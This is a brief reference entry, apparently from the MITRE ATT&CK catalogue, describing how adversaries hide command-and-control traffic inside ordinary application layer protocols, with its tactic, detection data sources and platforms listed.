Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre